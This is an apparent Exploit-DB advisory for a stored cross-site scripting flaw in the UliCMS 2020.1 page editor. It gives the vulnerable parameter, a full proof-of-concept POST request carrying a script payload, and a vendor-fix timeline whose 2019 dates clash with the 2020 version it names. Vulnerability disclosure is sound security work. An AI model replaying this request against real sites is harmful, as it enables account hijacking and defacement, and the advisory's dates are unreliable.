Share
# Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting  
# Google Dork: N/A  
# Date: 2019-03-24  
# Exploit Author: SunCSR  
# Vendor Homepage: https://en.ulicms.de  
# Software Link: https://en.ulicms.de/current_versions.html  
# Version: 2020.1  
# Tested on: Windows  
# CVE : N/A  
  
### Vulnerability : Stored Cross-Site Scripting  
  
# Description  
A stored cross-site-scripting security issue in the save page feature  
Url : http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20  
Request Type: POST  
Vulnerable Parameter : "content"  
Payload : content=<script>alert('XSS')</script>  
  
#POC  
POST /ulicms/admin/index.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0  
Accept: */*  
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 866  
Origin: http://TARGET  
Connection: close  
Cookie: 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7  
  
csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=20  
&slug=lorem_ipsum&title=Lorem+Ipsum&alternate_title=&show_headline=1&type=page&language=de&menu=top&position=15  
&parent_id=NULL&active=1&target=_self&hidden=0&category_id=1&menu_image=&link_url=&link_to_language=  
&meta_description=&meta_keywords=&robots=&article_author_name=&article_author_email=&article_date=&excerpt=&og_title=  
&og_description=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=&list_order_by=title  
&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=  
&text_position=before&article_image=&author_id=1&group_id=1&comments_enabled=null&cache_control=auto&theme=  
&access%5B%5D=all&custom_data=%7B%7D&content=<script>alert('XSS')</script>&csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb  
  
### History  
=============  
2019-03-18 Issue discovered  
2019-04-18 Vendor contacted  
2019-04-18 Vendor response and hotfix  
2019-04-24 Vendor releases fixed versions